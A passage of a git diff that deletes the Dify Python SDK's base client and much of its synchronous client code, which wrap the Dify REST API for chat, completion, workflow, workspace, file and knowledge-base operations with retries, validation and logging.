details.""" - url = f"/apps/templates/{template_id}" - return await self._send_request("GET", url) - - async def create_app_from_template(self, template_id: str, app_config: Dict[str, Any]): - """Create an app from a template.""" - url = f"/apps/templates/{template_id}/create" - return await self._send_request("POST", url, json=app_config) - - async def create_custom_template(self, app_id: str, template_config: Dict[str, Any]): - """Create a custom template from an existing app.""" - url = f"/apps/{app_id}/create-template" - return await self._send_request("POST", url, json=template_config) - - # App Analytics and Metrics APIs - async def get_app_analytics( - self, - app_id: str, - start_date: str, - end_date: str, - metrics: List[str] | None = None, - ): - """Get application analytics.""" - params = {"start_date": start_date, "end_date": end_date} - if metrics: - params["metrics"] = ",".join(metrics) - url = f"/apps/{app_id}/analytics" - return await self._send_request("GET", url, params=params) - - async def get_app_user_feedback(self, app_id: str, page: int = 1, limit: int = 20, rating: int | None = None): - """Get user feedback for an application.""" - params = {"page": page, "limit": limit} - if rating: - params["rating"] = rating - url = f"/apps/{app_id}/feedback" - return await self._send_request("GET", url, params=params) - - async def get_app_error_logs( - self, - app_id: str, - start_date: str, - end_date: str, - error_type: str | None = None, - page: int = 1, - limit: int = 20, - ): - """Get application error logs.""" - params = { - "start_date": start_date, - "end_date": end_date, - "page": page, - "limit": limit, - } - if error_type: - params["error_type"] = error_type - url = f"/apps/{app_id}/errors" - return await self._send_request("GET", url, params=params) - - # Advanced Configuration APIs - async def get_app_advanced_config(self, app_id: str): - """Get advanced application configuration.""" - url = f"/apps/{app_id}/advanced-config" - return await self._send_request("GET", url) - - async def update_app_advanced_config(self, app_id: str, config: Dict[str, Any]): - """Update advanced application configuration.""" - url = f"/apps/{app_id}/advanced-config" - return await self._send_request("PUT", url, json=config) - - async def get_app_environment_variables(self, app_id: str): - """Get application environment variables.""" - url = f"/apps/{app_id}/environment" - return await self._send_request("GET", url) - - async def update_app_environment_variables(self, app_id: str, variables: Dict[str, str]): - """Update application environment variables.""" - url = f"/apps/{app_id}/environment" - return await self._send_request("PUT", url, json=variables) - - async def get_app_resource_limits(self, app_id: str): - """Get application resource limits.""" - url = f"/apps/{app_id}/resource-limits" - return await self._send_request("GET", url) - - async def update_app_resource_limits(self, app_id: str, limits: Dict[str, Any]): - """Update application resource limits.""" - url = f"/apps/{app_id}/resource-limits" - return await self._send_request("PUT", url, json=limits) - - # App Integration APIs - async def get_app_integrations(self, app_id: str): - """Get application integrations.""" - url = f"/apps/{app_id}/integrations" - return await self._send_request("GET", url) - - async def add_app_integration(self, app_id: str, integration_config: Dict[str, Any]): - """Add integration to application.""" - url = f"/apps/{app_id}/integrations" - return await self._send_request("POST", url, json=integration_config) - - async def update_app_integration(self, app_id: str, integration_id: str, config: Dict[str, Any]): - """Update application integration.""" - url = f"/apps/{app_id}/integrations/{integration_id}" - return await self._send_request("PUT", url, json=config) - - async def remove_app_integration(self, app_id: str, integration_id: str): - """Remove integration from application.""" - url = f"/apps/{app_id}/integrations/{integration_id}" - return await self._send_request("DELETE", url) - - async def test_app_integration(self, app_id: str, integration_id: str): - """Test application integration.""" - url = f"/apps/{app_id}/integrations/{integration_id}/test" - return await self._send_request("POST", url) diff --git a/sdks/python-client/dify_client/base_client.py b/sdks/python-client/dify_client/base_client.py deleted file mode 100644 index 0ad6e07b23..0000000000 --- a/sdks/python-client/dify_client/base_client.py +++ /dev/null @@ -1,228 +0,0 @@ -"""Base client with common functionality for both sync and async clients.""" - -import json -import time -import logging -from typing import Dict, Callable, Optional - -try: - # Python 3.10+ - from typing import ParamSpec -except ImportError: - # Python < 3.10 - from typing_extensions import ParamSpec - -from urllib.parse import urljoin - -import httpx - -P = ParamSpec("P") - -from .exceptions import ( - DifyClientError, - APIError, - AuthenticationError, - RateLimitError, - ValidationError, - NetworkError, - TimeoutError, -) - - -class BaseClientMixin: - """Mixin class providing common functionality for Dify clients.""" - - def __init__( - self, - api_key: str, - base_url: str = "https://api.dify.ai/v1", - timeout: float = 60.0, - max_retries: int = 3, - retry_delay: float = 1.0, - enable_logging: bool = False, - ): - """Initialize the base client. - - Args: - api_key: Your Dify API key - base_url: Base URL for the Dify API - timeout: Request timeout in seconds - max_retries: Maximum number of retry attempts - retry_delay: Delay between retries in seconds - enable_logging: Enable detailed logging - """ - if not api_key: - raise ValidationError("API key is required") - - self.api_key = api_key - self.base_url = base_url.rstrip("/") - self.timeout = timeout - self.max_retries = max_retries - self.retry_delay = retry_delay - self.enable_logging = enable_logging - - # Setup logging - self.logger = logging.getLogger(f"dify_client.{self.__class__.__name__.lower()}") - if enable_logging and not self.logger.handlers: - # Create console handler with formatter - handler = logging.StreamHandler() - formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s") - handler.setFormatter(formatter) - self.logger.addHandler(handler) - self.logger.setLevel(logging.INFO) - self.enable_logging = True - else: - self.enable_logging = enable_logging - - def _get_headers(self, content_type: str = "application/json") -> Dict[str, str]: - """Get common request headers.""" - return { - "Authorization": f"Bearer {self.api_key}", - "Content-Type": content_type, - "User-Agent": "dify-client-python/0.1.12", - } - - def _build_url(self, endpoint: str) -> str: - """Build full URL from endpoint.""" - return urljoin(self.base_url + "/", endpoint.lstrip("/")) - - def _handle_response(self, response: httpx.Response) -> httpx.Response: - """Handle HTTP response and raise appropriate exceptions.""" - try: - if response.status_code == 401: - raise AuthenticationError( - "Authentication failed. Check your API key.", - status_code=response.status_code, - response=response.json() if response.content else None, - ) - elif response.status_code == 429: - retry_after = response.headers.get("Retry-After") - raise RateLimitError( - "Rate limit exceeded. Please try again later.", - retry_after=int(retry_after) if retry_after else None, - ) - elif response.status_code >= 400: - try: - error_data = response.json() - message = error_data.get("message", f"HTTP {response.status_code}") - except: - message = f"HTTP {response.status_code}: {response.text}" - - raise APIError( - message, - status_code=response.status_code, - response=response.json() if response.content else None, - ) - - return response - - except json.JSONDecodeError: - raise APIError( - f"Invalid JSON response: {response.text}", - status_code=response.status_code, - ) - - def _retry_request( - self, - request_func: Callable[P, httpx.Response], - request_context: str | None = None, - *args: P.args, - **kwargs: P.kwargs, - ) -> httpx.Response: - """Retry a request with exponential backoff. - - Args: - request_func: Function that performs the HTTP request - request_context: Context description for logging (e.g., "GET /v1/messages") - *args: Positional arguments to pass to request_func - **kwargs: Keyword arguments to pass to request_func - - Returns: - httpx.Response: Successful response - - Raises: - NetworkError: On network failures after retries - TimeoutError: On timeout failures after retries - APIError: On API errors (4xx/5xx responses) - DifyClientError: On unexpected failures - """ - last_exception = None - - for attempt in range(self.max_retries + 1): - try: - response = request_func(*args, **kwargs) - return response # Let caller handle response processing - - except (httpx.NetworkError, httpx.TimeoutException) as e: - last_exception = e - context_msg = f" {request_context}" if request_context else "" - - if attempt < self.max_retries: - delay = self.retry_delay * (2**attempt) # Exponential backoff - self.logger.warning( - f"Request failed{context_msg} (attempt {attempt + 1}/{self.max_retries + 1}): {e}. " - f"Retrying in {delay:.2f} seconds..." - ) - time.sleep(delay) - else: - self.logger.error(f"Request failed{context_msg} after {self.max_retries + 1} attempts: {e}") - # Convert to custom exceptions - if isinstance(e, httpx.TimeoutException): - from .exceptions import TimeoutError - - raise TimeoutError(f"Request timed out after {self.max_retries} retries{context_msg}") from e - else: - from .exceptions import NetworkError - - raise NetworkError( - f"Network error after {self.max_retries} retries{context_msg}: {str(e)}" - ) from e - - if last_exception: - raise last_exception - raise DifyClientError("Request failed after retries") - - def _validate_params(self, **params) -> None: - """Validate request parameters.""" - for key, value in params.items(): - if value is None: - continue - - # String validations - if isinstance(value, str): - if not value.strip(): - raise ValidationError(f"Parameter '{key}' cannot be empty or whitespace only") - if len(value) > 10000: - raise ValidationError(f"Parameter '{key}' exceeds maximum length of 10000 characters") - - # List validations - elif isinstance(value, list): - if len(value) > 1000: - raise ValidationError(f"Parameter '{key}' exceeds maximum size of 1000 items") - - # Dictionary validations - elif isinstance(value, dict): - if len(value) > 100: - raise ValidationError(f"Parameter '{key}' exceeds maximum size of 100 items") - - # Type-specific validations - if key == "user" and not isinstance(value, str): - raise ValidationError(f"Parameter '{key}' must be a string") - elif key in ["page", "limit", "page_size"] and not isinstance(value, int): - raise ValidationError(f"Parameter '{key}' must be an integer") - elif key == "files" and not isinstance(value, (list, dict)): - raise ValidationError(f"Parameter '{key}' must be a list or dict") - elif key == "rating" and value not in ["like", "dislike"]: - raise ValidationError(f"Parameter '{key}' must be 'like' or 'dislike'") - - def _log_request(self, method: str, url: str, **kwargs) -> None: - """Log request details.""" - self.logger.info(f"Making {method} request to {url}") - if kwargs.get("json"): - self.logger.debug(f"Request body: {kwargs['json']}") - if kwargs.get("params"): - self.logger.debug(f"Query params: {kwargs['params']}") - - def _log_response(self, response: httpx.Response) -> None: - """Log response details.""" - self.logger.info(f"Received response: {response.status_code} ({len(response.content)} bytes)") diff --git a/sdks/python-client/dify_client/client.py b/sdks/python-client/dify_client/client.py deleted file mode 100644 index cebdf6845c..0000000000 --- a/sdks/python-client/dify_client/client.py +++ /dev/null @@ -1,1267 +0,0 @@ -import json -import logging -import os -from typing import Literal, Dict, List, Any, IO, Optional, Union - -import httpx -from .base_client import BaseClientMixin -from .exceptions import ( - APIError, - AuthenticationError, - RateLimitError, - ValidationError, - FileUploadError, -) - - -class DifyClient(BaseClientMixin): - """Synchronous Dify API client. - - This client uses httpx.Client for efficient connection pooling and resource management. - It's recommended to use this client as a context manager: - - Example: - with DifyClient(api_key="your-key") as client: - response = client.get_app_info() - """ - - def __init__( - self, - api_key: str, - base_url: str = "https://api.dify.ai/v1", - timeout: float = 60.0, - max_retries: int = 3, - retry_delay: float = 1.0, - enable_logging: bool = False, - ): - """Initialize the Dify client. - - Args: - api_key: Your Dify API key - base_url: Base URL for the Dify API - timeout: Request timeout in seconds (default: 60.0) - max_retries: Maximum number of retry attempts (default: 3) - retry_delay: Delay between retries in seconds (default: 1.0) - enable_logging: Whether to enable request logging (default: True) - """ - # Initialize base client functionality - BaseClientMixin.__init__(self, api_key, base_url, timeout, max_retries, retry_delay, enable_logging) - - self._client = httpx.Client( - base_url=base_url, - timeout=httpx.Timeout(timeout, connect=5.0), - ) - - def __enter__(self): - """Support context manager protocol.""" - return self - - def __exit__(self, exc_type, exc_val, exc_tb): - """Clean up resources when exiting context.""" - self.close() - - def close(self): - """Close the HTTP client and release resources.""" - if hasattr(self, "_client"): - self._client.close() - - def _send_request( - self, - method: str, - endpoint: str, - json: Dict[str, Any] | None = None, - params: Dict[str, Any] | None = None, - stream: bool = False, - **kwargs, - ): - """Send an HTTP request to the Dify API with retry logic. - - Args: - method: HTTP method (GET, POST, PUT, PATCH, DELETE) - endpoint: API endpoint path - json: JSON request body - params: Query parameters - stream: Whether to stream the response - **kwargs: Additional arguments to pass to httpx.request - - Returns: - httpx.Response object - """ - # Validate parameters - if json: - self._validate_params(**json) - if params: - self._validate_params(**params) - - headers = { - "Authorization": f"Bearer {self.api_key}", - "Content-Type": "application/json", - } - - def make_request(): - """Inner function to perform the actual HTTP request.""" - # Log request if logging is enabled - if self.enable_logging: - self.logger.info(f"Sending {method} request to {endpoint}") - # Debug logging for detailed information - if self.logger.isEnabledFor(logging.DEBUG): - if json: - self.logger.debug(f"Request body: {json}") - if params: - self.logger.debug(f"Request params: {params}") - - # httpx.Client automatically prepends base_url - response = self._client.request( - method, - endpoint, - json=json, - params=params, - headers=headers, - **kwargs, - ) - - # Log response if logging is enabled - if self.enable_logging: - self.logger.info(f"Received response: {response.status_code}") - - return response - - # Use the retry mechanism from base client - request_context = f"{method} {endpoint}" - response = self._retry_request(make_request, request_context) - - # Handle error responses (API errors don't retry) - self._handle_error_response(response) - - return response - - def _handle_error_response(self, response, is_upload_request: bool = False) -> None: - """Handle HTTP error responses and raise appropriate exceptions.""" - - if response.status_code < 400: - return # Success response - - try: - error_data = response.json() - message = error_data.get("message", f"HTTP {response.status_code}") - except (ValueError, KeyError): - message = f"HTTP {response.status_code}" - error_data = None - - # Log error response if logging is enabled - if self.enable_logging: - self.logger.error(f"API error: {response.status_code} - {message}") - - if response.status_code == 401: - raise AuthenticationError(message, response.status_code, error_data) - elif response.status_code == 429: - retry_after = response.headers.get("Retry-After") - raise RateLimitError(message, retry_after) - elif response.status_code == 422: - raise ValidationError(message, response.status_code, error_data) - elif response.status_code == 400: - # Check if this is a file upload error based on the URL or context - current_url = getattr(response, "url", "") or "" - if is_upload_request or "upload" in str(current_url).lower() or "files" in str(current_url).lower(): - raise FileUploadError(message, response.status_code, error_data) - else: - raise APIError(message, response.status_code, error_data) - elif response.status_code >= 500: - # Server errors should raise APIError - raise APIError(message, response.status_code, error_data) - elif response.status_code >= 400: - raise APIError(message, response.status_code, error_data) - - def _send_request_with_files(self, method: str, endpoint: str, data: dict, files: dict): - """Send an HTTP request with file uploads. - - Args: - method: HTTP method (POST, PUT, etc.) - endpoint: API endpoint path - data: Form data - files: Files to upload - - Returns: - httpx.Response object - """ - headers = {"Authorization": f"Bearer {self.api_key}"} - - # Log file upload request if logging is enabled - if self.enable_logging: - self.logger.info(f"Sending {method} file upload request to {endpoint}") - self.logger.debug(f"Form data: {data}") - self.logger.debug(f"Files: {files}") - - response = self._client.request( - method, - endpoint, - data=data, - headers=headers, - files=files, - ) - - # Log response if logging is enabled - if self.enable_logging: - self.logger.info(f"Received file upload response: {response.status_code}") - - # Handle error responses - self._handle_error_response(response, is_upload_request=True) - - return response - - def message_feedback(self, message_id: str, rating: Literal["like", "dislike"], user: str): - self._validate_params(message_id=message_id, rating=rating, user=user) - data = {"rating": rating, "user": user} - return self._send_request("POST", f"/messages/{message_id}/feedbacks", data) - - def get_application_parameters(self, user: str): - params = {"user": user} - return self._send_request("GET", "/parameters", params=params) - - def file_upload(self, user: str, files: dict): - data = {"user": user} - return self._send_request_with_files("POST", "/files/upload", data=data, files=files) - - def text_to_audio(self, text: str, user: str, streaming: bool = False): - data = {"text": text, "user": user, "streaming": streaming} - return self._send_request("POST", "/text-to-audio", json=data) - - def get_meta(self, user: str): - params = {"user": user} - return self._send_request("GET", "/meta", params=params) - - def get_app_info(self): - """Get basic application information including name, description, tags, and mode.""" - return self._send_request("GET", "/info") - - def get_app_site_info(self): - """Get application site information.""" - return self._send_request("GET", "/site") - - def get_file_preview(self, file_id: str): - """Get file preview by file ID.""" - return self._send_request("GET", f"/files/{file_id}/preview") - - # App Configuration APIs - def get_app_site_config(self, app_id: str): - """Get app site configuration. - - Args: - app_id: ID of the app - - Returns: - App site configuration - """ - url = f"/apps/{app_id}/site/config" - return self._send_request("GET", url) - - def update_app_site_config(self, app_id: str, config_data: Dict[str, Any]): - """Update app site configuration. - - Args: - app_id: ID of the app - config_data: Configuration data to update - - Returns: - Updated app site configuration - """ - url = f"/apps/{app_id}/site/config" - return self._send_request("PUT", url, json=config_data) - - def get_app_api_tokens(self, app_id: str): - """Get API tokens for an app. - - Args: - app_id: ID of the app - - Returns: - List of API tokens - """ - url = f"/apps/{app_id}/api-tokens" - return self._send_request("GET", url) - - def create_app_api_token(self, app_id: str, name: str, description: str | None = None): - """Create a new API token for an app. - - Args: - app_id: ID of the app - name: Name for the API token - description: Description for the API token (optional) - - Returns: - Created API token information - """ - data = {"name": name, "description": description} - url = f"/apps/{app_id}/api-tokens" - return self._send_request("POST", url, json=data) - - def delete_app_api_token(self, app_id: str, token_id: str): - """Delete an API token. - - Args: - app_id: ID of the app - token_id: ID of the token to delete - - Returns: - Deletion result - """ - url = f"/apps/{app_id}/api-tokens/{token_id}" - return self._send_request("DELETE", url) - - -class CompletionClient(DifyClient): - def create_completion_message( - self, - inputs: dict, - response_mode: Literal["blocking", "streaming"], - user: str, - files: Dict[str, Any] | None = None, - ): - # Validate parameters - if not isinstance(inputs, dict): - raise ValidationError("inputs must be a dictionary") - if response_mode not in ["blocking", "streaming"]: - raise ValidationError("response_mode must be 'blocking' or 'streaming'") - - self._validate_params(inputs=inputs, response_mode=response_mode, user=user) - - data = { - "inputs": inputs, - "response_mode": response_mode, - "user": user, - "files": files, - } - return self._send_request( - "POST", - "/completion-messages", - data, - stream=(response_mode == "streaming"), - ) - - -class ChatClient(DifyClient): - def create_chat_message( - self, - inputs: dict, - query: str, - user: str, - response_mode: Literal["blocking", "streaming"] = "blocking", - conversation_id: str | None = None, - files: Dict[str, Any] | None = None, - ): - # Validate parameters - if not isinstance(inputs, dict): - raise ValidationError("inputs must be a dictionary") - if not isinstance(query, str) or not query.strip(): - raise ValidationError("query must be a non-empty string") - if response_mode not in ["blocking", "streaming"]: - raise ValidationError("response_mode must be 'blocking' or 'streaming'") - - self._validate_params(inputs=inputs, query=query, user=user, response_mode=response_mode) - - data = { - "inputs": inputs, - "query": query, - "user": user, - "response_mode": response_mode, - "files": files, - } - if conversation_id: - data["conversation_id"] = conversation_id - - return self._send_request( - "POST", - "/chat-messages", - data, - stream=(response_mode == "streaming"), - ) - - def get_suggested(self, message_id: str, user: str): - params = {"user": user} - return self._send_request("GET", f"/messages/{message_id}/suggested", params=params) - - def stop_message(self, task_id: str, user: str): - data = {"user": user} - return self._send_request("POST", f"/chat-messages/{task_id}/stop", data) - - def get_conversations( - self, - user: str, - last_id: str | None = None, - limit: int | None = None, - pinned: bool | None = None, - ): - params = {"user": user, "last_id": last_id, "limit": limit, "pinned": pinned} - return self._send_request("GET", "/conversations", params=params) - - def get_conversation_messages( - self, - user: str, - conversation_id: str | None = None, - first_id: str | None = None, - limit: int | None = None, - ): - params = {"user": user} - - if conversation_id: - params["conversation_id"] = conversation_id - if first_id: - params["first_id"] = first_id - if limit: - params["limit"] = limit - - return self._send_request("GET", "/messages", params=params) - - def rename_conversation(self, conversation_id: str, name: str, auto_generate: bool, user: str): - data = {"name": name, "auto_generate": auto_generate, "user": user} - return self._send_request("POST", f"/conversations/{conversation_id}/name", data) - - def delete_conversation(self, conversation_id: str, user: str): - data = {"user": user} - return self._send_request("DELETE", f"/conversations/{conversation_id}", data) - - def audio_to_text(self, audio_file: Union[IO[bytes], tuple], user: str): - data = {"user": user} - files = {"file": audio_file} - return self._send_request_with_files("POST", "/audio-to-text", data, files) - - # Annotation APIs - def annotation_reply_action( - self, - action: Literal["enable", "disable"], - score_threshold: float, - embedding_provider_name: str, - embedding_model_name: str, - ): - """Enable or disable annotation reply feature.""" - data = { - "score_threshold": score_threshold, - "embedding_provider_name": embedding_provider_name, - "embedding_model_name": embedding_model_name, - } - return self._send_request("POST", f"/apps/annotation-reply/{action}", json=data) - - def get_annotation_reply_status(self, action: Literal["enable", "disable"], job_id: str): - """Get the status of an annotation reply action job.""" - return self._send_request("GET", f"/apps/annotation-reply/{action}/status/{job_id}") - - def list_annotations(self, page: int = 1, limit: int = 20, keyword: str | None = None): - """List annotations for the application.""" - params = {"page": page, "limit": limit, "keyword": keyword} - return self._send_request("GET", "/apps/annotations", params=params) - - def create_annotation(self, question: str, answer: str): - """Create a new annotation.""" - data = {"question": question, "answer": answer} - return self._send_request("POST", "/apps/annotations", json=data) - - def update_annotation(self, annotation_id: str, question: str, answer: str): - """Update an existing annotation.""" - data = {"question": question, "answer": answer} - return self._send_request("PUT", f"/apps/annotations/{annotation_id}", json=data) - - def delete_annotation(self, annotation_id: str): - """Delete an annotation.""" - return self._send_request("DELETE", f"/apps/annotations/{annotation_id}") - - # Conversation Variables APIs - def get_conversation_variables(self, conversation_id: str, user: str): - """Get all variables for a specific conversation. - - Args: - conversation_id: The conversation ID to query variables for - user: User identifier - - Returns: - Response from the API containing: - - variables: List of conversation variables with their values - - conversation_id: The conversation ID - """ - params = {"user": user} - url = f"/conversations/{conversation_id}/variables" - return self._send_request("GET", url, params=params) - - def update_conversation_variable(self, conversation_id: str, variable_id: str, value: Any, user: str): - """Update a specific conversation variable. - - Args: - conversation_id: The conversation ID - variable_id: The variable ID to update - value: New value for the variable - user: User identifier - - Returns: - Response from the API with updated variable information - """ - data = {"value": value, "user": user} - url = f"/conversations/{conversation_id}/variables/{variable_id}" - return self._send_request("PUT", url, json=data) - - def delete_annotation_with_response(self, annotation_id: str): - """Delete an annotation with full response handling.""" - url = f"/apps/annotations/{annotation_id}" - return self._send_request("DELETE", url) - - def list_conversation_variables_with_pagination( - self, conversation_id: str, user: str, page: int = 1, limit: int = 20 - ): - """List conversation variables with pagination.""" - params = {"page": page, "limit": limit, "user": user} - url = f"/conversations/{conversation_id}/variables" - return self._send_request("GET", url, params=params) - - def update_conversation_variable_with_response(self, conversation_id: str, variable_id: str, user: str, value: Any): - """Update a conversation variable with full response handling.""" - data = {"value": value, "user": user} - url = f"/conversations/{conversation_id}/variables/{variable_id}" - return self._send_request("PUT", url, json=data) - - # Enhanced Annotation APIs - def get_annotation_reply_job_status(self, action: str, job_id: str): - """Get status of an annotation reply action job.""" - url = f"/apps/annotation-reply/{action}/status/{job_id}" - return self._send_request("GET", url) - - def list_annotations_with_pagination(self, page: int = 1, limit: int = 20, keyword: str | None = None): - """List annotations with pagination.""" - params = {"page": page, "limit": limit, "keyword": keyword} - return self._send_request("GET", "/apps/annotations", params=params) - - def create_annotation_with_response(self, question: str, answer: str): - """Create an annotation with full response handling.""" - data = {"question": question, "answer": answer} - return self._send_request("POST", "/apps/annotations", json=data) - - def update_annotation_with_response(self, annotation_id: str, question: str, answer: str): - """Update an annotation with full response handling.""" - data = {"question": question, "answer": answer} - url = f"/apps/annotations/{annotation_id}" - return self._send_request("PUT", url, json=data) - - -class WorkflowClient(DifyClient): - def run( - self, - inputs: dict, - response_mode: Literal["blocking", "streaming"] = "streaming", - user: str = "abc-123", - ): - data = {"inputs": inputs, "response_mode": response_mode, "user": user} - return self._send_request("POST", "/workflows/run", data) - - def stop(self, task_id, user): - data = {"user": user} - return self._send_request("POST", f"/workflows/tasks/{task_id}/stop", data) - - def get_result(self, workflow_run_id): - return self._send_request("GET", f"/workflows/run/{workflow_run_id}") - - def get_workflow_logs( - self, - keyword: str = None, - status: Literal["succeeded", "failed", "stopped"] | None = None, - page: int = 1, - limit: int = 20, - created_at__before: str = None, - created_at__after: str = None, - created_by_end_user_session_id: str = None, - created_by_account: str = None, - ): - """Get workflow execution logs with optional filtering.""" - params = {"page": page, "limit": limit} - if keyword: - params["keyword"] = keyword - if status: - params["status"] = status - if created_at__before: - params["created_at__before"] = created_at__before - if created_at__after: - params["created_at__after"] = created_at__after - if created_by_end_user_session_id: - params["created_by_end_user_session_id"] = created_by_end_user_session_id - if created_by_account: - params["created_by_account"] = created_by_account - return self._send_request("GET", "/workflows/logs", params=params) - - def run_specific_workflow( - self, - workflow_id: str, - inputs: dict, - response_mode: Literal["blocking", "streaming"] = "streaming", - user: str = "abc-123", - ): - """Run a specific workflow by workflow ID.""" - data = {"inputs": inputs, "response_mode": response_mode, "user": user} - return self._send_request( - "POST", - f"/workflows/{workflow_id}/run", - data, - stream=(response_mode == "streaming"), - ) - - # Enhanced Workflow APIs - def get_workflow_draft(self, app_id: str): - """Get workflow draft configuration. - - Args: - app_id: ID of the workflow app - - Returns: - Workflow draft configuration - """ - url = f"/apps/{app_id}/workflow/draft" - return self._send_request("GET", url) - - def update_workflow_draft(self, app_id: str, workflow_data: Dict[str, Any]): - """Update workflow draft configuration. - - Args: - app_id: ID of the workflow app - workflow_data: Workflow configuration data - - Returns: - Updated workflow draft - """ - url = f"/apps/{app_id}/workflow/draft" - return self._send_request("PUT", url, json=workflow_data) - - def publish_workflow(self, app_id: str): - """Publish workflow from draft. - - Args: - app_id: ID of the workflow app - - Returns: - Published workflow information - """ - url = f"/apps/{app_id}/workflow/publish" - return self._send_request("POST", url) - - def get_workflow_run_history( - self, - app_id: str, - page: int = 1, - limit: int = 20, - status: Literal["succeeded", "failed", "stopped"] | None = None, - ): - """Get workflow run history. - - Args: - app_id: ID of the workflow app - page: Page number (default: 1) - limit: Number of items per page (default: 20) - status: Filter by status (optional) - - Returns: - Paginated workflow run history - """ - params = {"page": page, "limit": limit} - if status: - params["status"] = status - url = f"/apps/{app_id}/workflow/runs" - return self._send_request("GET", url, params=params) - - -class WorkspaceClient(DifyClient): - """Client for workspace-related operations.""" - - def get_available_models(self, model_type: str): - """Get available models by model type.""" - url = f"/workspaces/current/models/model-types/{model_type}" - return self._send_request("GET", url) - - def get_available_models_by_type(self, model_type: str): - """Get available models by model type (enhanced version).""" - url = f"/workspaces/current/models/model-types/{model_type}" - return self._send_request("GET", url) - - def get_model_providers(self): - """Get all model providers.""" - return self._send_request("GET", "/workspaces/current/model-providers") - - def get_model_provider_models(self, provider_name: str): - """Get models for a specific provider.""" - url = f"/workspaces/current/model-providers/{provider_name}/models" - return self._send_request("GET", url) - - def validate_model_provider_credentials(self, provider_name: str, credentials: Dict[str, Any]): - """Validate model provider credentials.""" - url = f"/workspaces/current/model-providers/{provider_name}/credentials/validate" - return self._send_request("POST", url, json=credentials) - - # File Management APIs - def get_file_info(self, file_id: str): - """Get information about a specific file.""" - url = f"/files/{file_id}/info" - return self._send_request("GET", url) - - def get_file_download_url(self, file_id: str): - """Get download URL for a file.""" - url = f"/files/{file_id}/download-url" - return self._send_request("GET", url) - - def delete_file(self, file_id: str): - """Delete a file.""" - url = f"/files/{file_id}" - return self._send_request("DELETE", url) - - -class KnowledgeBaseClient(DifyClient): - def __init__( - self, - api_key: str, - base_url: str = "https://api.dify.ai/v1", - dataset_id: str | None = None, - ): - """ - Construct a KnowledgeBaseClient object. - - Args: - api_key (str): API key of Dify. - base_url (str, optional): Base URL of Dify API. Defaults to 'https://api.dify.ai/v1'. - dataset_id (str, optional): ID of the dataset. Defaults to None. You don't need this if you just want to - create a new dataset. or list datasets. otherwise you need to set this. - """ - super().__init__(api_key=api_key, base_url=base_url) - self.dataset_id = dataset_id - - def _get_dataset_id(self): - if self.dataset_id is None: - raise ValueError("dataset_id is not set") - return self.dataset_id - - def create_dataset(self, name: str, **kwargs): - return self._send_request("POST", "/datasets", {"name": name}, **kwargs) - - def list_datasets(self, page: int = 1, page_size: int = 20, **kwargs): - return self._send_request("GET", "/datasets", params={"page": page, "limit": page_size}, **kwargs) - - def create_document_by_text(self, name, text, extra_params: Dict[str, Any] | None = None, **kwargs): - """ - Create a document by text. - - :param name: Name of the document - :param text: Text content of the document - :param extra_params: extra parameters pass to the API, such as indexing_technique, process_rule. (optional) - e.g. - { - 'indexing_technique': 'high_quality', - 'process_rule': { - 'rules': { - 'pre_processing_rules': [ - {'id': 'remove_extra_spaces', 'enabled': True}, - {'id': 'remove_urls_emails', 'enabled': True} - ], - 'segmentation': { - 'separator': '\n', - 'max_tokens': 500 - } - }, - 'mode': 'custom' - } - } - :return: Response from the API - """ - data = { - "indexing_technique": "high_quality", - "process_rule": {"mode": "automatic"}, - "name": name, - "text": text, - } - if extra_params is not None and isinstance(extra_params, dict): - data.update(extra_params) - url = f"/datasets/{self._get_dataset_id()}/document/create_by_text" - return self._send_request("POST", url, json=data, **kwargs) - - def update_document_by_text( - self, - document_id: str, - name: str, - text: str, - extra_params: Dict[str, Any] | None = None, - **kwargs, - ): - """ - Update a document by text. - - :param document_id: ID of the document - :param name: Name of the document - :param text: Text content of the document - :param extra_params: extra parameters pass to the API, such as indexing_technique, process_rule. (optional) - e.g. - { - 'indexing_technique': 'high_quality', - 'process_rule': { - 'rules': { - 'pre_processing_rules': [ - {'id': 'remove_extra_spaces', 'enabled': True}, - {'id': 'remove_urls_emails', 'enabled': True} - ], - 'segmentation': { - 'separator': '\n', - 'max_tokens': 500 - } - }, - 'mode': 'custom' - } - } - :return: Response from the API - """ - data = {"name": name, "text": text} - if extra_params is not None and isinstance(extra_params, dict): - data.update(extra_params) - url = f"/datasets/{self._get_dataset_id()}/documents/{document_id}/update_by_text" - return self._send_request("POST", url, json=data, **kwargs) - - def create_document_by_file( - self, - file_path: str, - original_document_id: str | None = None, - extra_params: Dict[str, Any] | None = None, - ): - """ - Create a document by file. - - :param file_path: Path to the file - :param original_document_id: pass this ID if you want to replace the original document (optional) - :param extra_params: extra parameters pass to the API, such as indexing_technique, process_rule. (optional) - e.g. - { - 'indexing_technique': 'high_quality', - 'process_rule': { - 'rules': { - 'pre_processing_rules': [ - {'id': 'remove_extra_spaces', 'enabled': True}, - {'id': 'remove_urls_emails', 'enabled': True} - ], - 'segmentation': { - 'separator': '\n', - 'max_tokens': 500 - } - }, - 'mode': 'custom' - } - } - :return: Response from the API - """ - with open(file_path, "rb") as f: - files = {"file": (os.path.basename(file_path), f)} - data = { - "process_rule": {"mode": "automatic"}, - "indexing_technique": "high_quality", - } - if extra_params is not None and isinstance(extra_params, dict): - data.update(extra_params) - if original_document_id is not None: - data["original_document_id"] = original_document_id - url = f"/datasets/{self._get_dataset_id()}/document/create_by_file" - return self._send_request_with_files("POST", url, {"data": json.dumps(data)}, files) - - def update_document_by_file( - self, - document_id: str, - file_path: str, - extra_params: Dict[str, Any] | None = None, - ): - """ - Update a document by file. - - :param document_id: ID of the document - :param file_path: Path to the file - :param extra_params: extra parameters pass to the API, such as indexing_technique, process_rule. (optional) - e.g. - { - 'indexing_technique': 'high_quality', - 'process_rule': { - 'rules': { - 'pre_processing_rules': [ - {'id': 'remove_extra_spaces', 'enabled': True}, - {'id': 'remove_urls_emails', 'enabled': True} - ], - 'segmentation': { - 'separator': '\n', - 'max_tokens': 500 - } - }, - 'mode': 'custom' - } - } - :return: - """ - with open(file_path, "rb") as f: - files = {"file": (os.path.basename(file_path), f)} - data = {} - if extra_params is not None and isinstance(extra_params, dict): - data.update(extra_params) - url = f"/datasets/{self._get_dataset_id()}/documents/{document_id}/update_by_file" - return self._send_request_with_files("POST", url, {"data": json.dumps(data)}, files) - - def batch_indexing_status(self, batch_id: str, **kwargs): - """ - Get the status of the batch indexing. - - :param batch_id: ID of the batch uploading - :return: Response from the API - """ - url = f"/datasets/{self._get_dataset_id()}/documents/{batch_id}/indexing-status" - return self._send_request("GET", url, **kwargs) - - def delete_dataset(self): - """ - 